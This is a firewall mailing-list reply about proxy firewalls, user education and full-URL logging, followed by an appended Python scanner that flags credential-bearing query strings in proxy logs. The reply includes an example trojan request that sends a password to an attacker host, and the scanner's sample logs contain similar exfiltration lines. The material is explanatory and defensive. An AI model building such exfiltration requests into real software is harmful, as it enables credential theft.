Bill Royds wrote:
> 
> Most users of Win9x are naive about the nature of the Internet and are 
> not aware of the risks inherent in various Internet services. They will 
> run programs that attempt to download binary data through HTTP, are easily 
> persuaded to click on executables in email, etc. A proxy firewall forces 

A naive user is an education problem. It could be addressed in some way
using firewalls (deny dangerous services such as ports 137/138/139 at
your router or firewall), but you can't do much anyway if you allow
ICQ/Napster/iMesh traffic and then your user opens the whole hard disk
to the world.

> connections to be valid for the protocol (but see Marcus Ranum's recent 
> rants on firewall-wizards about the real efficacy of proxies). This helps 
> prevent trojans from sending raw binary data through port 80 or 
> fragmentation attacks through the firewall to the desktop.  The logging 

Even so, you can still write a trojan that sends a valid HTTP request as data:
GET http://www.cracker.com/cgi-bin/collector?[EMAIL PROTECTED]+winpass=abc123
or something like that...

On the other hand, you have to see what you charge to your firewall
and what you should charge to another device like an IDS. Traditional
firewall definitions state things like "avoid spread of attacks", "limit
network exposure", "enforce usage policy", and so on... but no one
says "it should detect and avoid an attack completely".


> also tends to be a bit more thorough so the full URL of an HTTP request 
> is in the logs, one can limit which NNTP groups can be seen, not just 
> which server can be used etc.

You can do that with FW-1. 


>   Since a corporate network may have thousands of machines, each 
> belonging to hundreds of possible entities, this helps ensure that the 
> rules are applied properly and reduces the risk of machines falling 
> through the cracks. It can be done in FW-1 but it takes more than 
> skill in playing with the management console to achieve it.

It depends on how you want to manage it... and it depends on other
things too, like your network architecture; not so much (as I see it)
on the firewalling technology. But anyway, if you really need
this approach, maybe a product like Novell's BorderManager, which has
NDS integration, may fit your needs. But I think BorderManager is
not the only solution with directory integration. FW-1 has integration
with directories too... :-)

Regards.

-- 
Martin Humberto Hoz Salvador
Information Security Consultant (ISS ICU, Check Point CCSE)
C   I   T   I 
Sendero Sur  285  Col. Contry,  Monterrey,  Nuevo Leon 64860, MEXICO
Phone: +(52)(8) 357-2267 x139   Fax: +(52)(8) 357-8047
E-mail: [EMAIL PROTECTED]        WWW:  http://www.citi.com.mx
PGPKey ID: 0x0454E8D9           ICQ Number: 31631540
GIT d- s:(+:+) a-- C+(++++)>$ SILH++++ P++ L+++ E W++ N+ o-- K- w 
O M V PS+ PE++ Y+ PGP++ t 5 X+ R tv- b+ DI+ D++ G++ e++ h-- r+ y++

"The software said it requires Windows 95 or *better*, so I installed Linux"
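The two points in the thread above fit together: a trojan can exfiltrate data inside a perfectly valid HTTP request (the "collector?...winpass=abc123" example), and a proxy that logs the full URL rather than just the destination host is what lets you notice it afterwards. The following is an added example, not code from the thread or from any firewall product: a small scanner over constructed proxy log lines that flags query strings carrying credential-like parameter names, e-mail addresses, or long base64-looking blobs. The log format, the hostnames and the heuristics are all assumptions made for the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample proxy log lines in an assumed "<client> <method> <full URL>"
# format. Only a proxy that records the full URL (not just the destination
# host) can produce the third field, which is the logging point made above.
SAMPLE_LOG = """\
10.0.0.17 GET http://intranet.example/index.html
10.0.0.23 GET http://www.example.net/search?q=firewall+proxy
10.0.0.42 GET http://collector.invalid/cgi-bin/collector?email=alice@example.org&winpass=abc123
10.0.0.42 GET http://collector.invalid/cgi-bin/collector?d=dXNlcj1hbGljZTtwYXNzPWFiYzEyMw==
10.0.0.23 GET http://www.example.net/login?user=bob
"""

# Constructed heuristics (assumptions for this example, not from the thread):
# parameter names that usually carry secrets, values shaped like e-mail
# addresses, and long base64-looking values that may be an encoded blob.
SUSPECT_KEYS = re.compile(r"(pass|pwd|secret|token|cred)", re.I)
EMAIL_RE = re.compile(r"^[^@\s]+@[^@\s]+\.[^@\s]+$")
BASE64_RE = re.compile(r"^[A-Za-z0-9+/]{24,}={0,2}$")


def suspicious_params(url):
    """Return a list of (reason, parameter_name) for query parameters in
    `url` that look like exfiltrated data; empty list if nothing stands out."""
    findings = []
    # parse_qsl also URL-decodes, so "a+b" and "%40" are inspected decoded.
    for key, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        if SUSPECT_KEYS.search(key):
            findings.append(("credential-like key", key))
        elif EMAIL_RE.match(value):
            findings.append(("email address in value", key))
        elif BASE64_RE.match(value):
            findings.append(("long base64-like value", key))
    return findings


def scan_log(text):
    """Parse proxy log text and return (client, url, findings) for every
    request whose query string triggered at least one heuristic."""
    flagged = []
    for line in text.splitlines():
        parts = line.split(None, 2)
        if len(parts) != 3:
            continue  # skip malformed or blank lines
        client, _method, url = parts
        findings = suspicious_params(url)
        if findings:
            flagged.append((client, url, findings))
    return flagged


if __name__ == "__main__":
    for client, url, findings in scan_log(SAMPLE_LOG):
        print(client, url)
        for reason, key in findings:
            print("    ", reason, "-> parameter", repr(key))
```

Run as a script it prints only the two requests from 10.0.0.42; the ordinary search and login lines pass through untouched. The heuristics are deliberately simple and will produce false positives on legitimate forms that submit an e-mail address by GET, so in practice this kind of check is a triage aid over proxy logs, not a blocking rule.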

